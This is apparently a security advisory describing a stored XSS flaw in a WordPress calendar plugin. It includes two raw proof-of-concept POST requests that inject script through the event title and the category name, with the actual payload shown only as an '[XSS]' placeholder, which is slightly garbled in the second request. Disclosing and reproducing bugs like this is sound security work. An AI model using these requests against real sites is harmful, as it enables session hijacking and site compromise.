This WordPress plugin allows remote authenticated users, without the unfiltered_html capability, to execute JavaScript code through stored XSS attack. The plugin by default is available to users with contributor or more privileges.
POC 1#
You can inject JavaScript code into the event title when creating it:
POST /wordpress/wp-admin/admin.php?page=calendar HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=calendar&action=delete&event_id=3&_wpnonce=cc7cb5ade4
Content-Type: application/x-www-form-urlencoded
Content-Length: 375
Connection: close
action=add&event_id=&_wpnonce=4c75b15fa6&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar%26action%3Ddelete%26event_id%3D3%26_wpnonce%3Dcc7cb5ade4&event_title=%[XSS]&event_desc=test&event_category=1&event_link=&event_begin=2018-10-30&event_end=2018-10-30&event_time=21%3A24&event_repeats=0&event_recur=S&save=Save+%C2%BB
POC 2#
You can inject JavaScript code into the category name when creating it:
POST /wordpress/wp-admin/admin.php?page=calendar-categories HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer:
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
mode=add&category_id=&_wpnonce=fc2e4e9618&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar-categories&category_name=[XSS È&category_colour=&save=Save+%C2%BB